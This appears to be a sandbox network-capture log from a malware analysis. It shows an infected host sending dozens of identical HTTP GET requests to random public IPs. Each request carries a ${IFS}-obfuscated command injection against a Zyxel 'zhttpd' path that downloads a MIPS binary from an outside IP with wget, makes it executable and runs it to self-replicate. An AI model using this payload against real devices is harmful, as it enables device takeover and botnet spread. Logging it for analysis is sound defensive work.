                                            Jan 14, 2024 15:50:41.451535940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4899192.168.2.2334708192.253.127.193443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.451579094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4900192.168.2.234293223.29.204.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.451600075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4901192.168.2.233803457.77.134.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.451613903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4902192.168.2.2352176154.152.77.136443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.451642036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4903192.168.2.2339394173.112.179.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.451709986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4904192.168.2.234161081.121.36.216443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.451714039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4905192.168.2.2341764152.69.213.94443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.451733112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4906192.168.2.2338202158.7.132.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.451777935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4907192.168.2.233963867.31.0.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.451809883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4908192.168.2.2356978114.213.7.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.451813936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4909192.168.2.2358274152.131.95.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.451877117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4910192.168.2.2349288177.10.140.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.451884031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4911192.168.2.234205645.14.81.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.451900005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4912192.168.2.233996073.39.228.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.451936007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4913192.168.2.234071444.182.119.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.451989889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4914192.168.2.2358150145.185.131.225443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.452017069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4915192.168.2.2352372115.101.221.66443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.452038050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4916192.168.2.2333284210.137.14.98443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.452074051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4917192.168.2.233835260.155.155.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.452085972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4918192.168.2.2352320163.152.36.133443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.452121973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4919192.168.2.2339922105.124.210.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.452148914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4920192.168.2.234662613.123.107.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.452167034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4921192.168.2.2355114131.11.98.237443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.452227116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4922192.168.2.235854899.153.83.198443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.452274084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4923192.168.2.2335648201.131.127.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.452303886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4924192.168.2.2347738156.133.4.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.452334881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4925192.168.2.2359718183.194.174.246443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.452369928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4926192.168.2.23399841.201.176.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.452395916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4927192.168.2.2356378118.30.227.35443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.452425957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4928192.168.2.234277467.224.27.194443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.452459097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4929192.168.2.2353996129.129.37.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.452490091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4930192.168.2.234551023.232.255.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.452511072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4931192.168.2.233917634.54.224.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.452574968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4932192.168.2.2341048145.134.143.184443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.452572107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4933192.168.2.234178285.169.184.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.452604055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4934192.168.2.235793489.189.211.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.452636003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4935192.168.2.2347416129.237.65.208443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.452652931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4936192.168.2.235050679.156.91.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.452701092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4937192.168.2.2357550181.96.24.97443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.452716112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4938192.168.2.2345070186.32.175.64443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.452766895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4939192.168.2.235825814.205.141.1443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.452773094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4940192.168.2.235334875.177.168.206443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.452791929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4941192.168.2.2335636112.252.216.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.452826977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4942192.168.2.2335948171.187.22.8443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.452864885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4943192.168.2.233512035.214.70.193443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.452897072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4944192.168.2.234405662.5.135.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.452950001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4945192.168.2.2338672180.18.20.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.452972889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4946192.168.2.234138824.27.249.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.453001976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4947192.168.2.234319274.45.181.57443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.453051090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4948192.168.2.2334746186.233.182.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.453072071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4949192.168.2.2347462126.227.135.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.453094959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4950192.168.2.2360926166.149.135.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.453136921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4951192.168.2.2355534177.90.52.219443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.453172922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4952192.168.2.2340826169.110.47.251443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.453197956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4953192.168.2.234156479.21.103.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.453227043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4954192.168.2.2336172112.103.208.169443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.453286886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4955192.168.2.234182485.235.225.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.453298092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4956192.168.2.236001496.73.81.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.453329086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4957192.168.2.2348730221.232.111.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.453366041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4958192.168.2.2357310146.250.227.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.453377962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4959192.168.2.235903669.244.174.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.453412056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4960192.168.2.2346906129.86.12.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.453466892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4961192.168.2.23446325.64.53.1443
                                            TimestampBytes transferredDirectionData
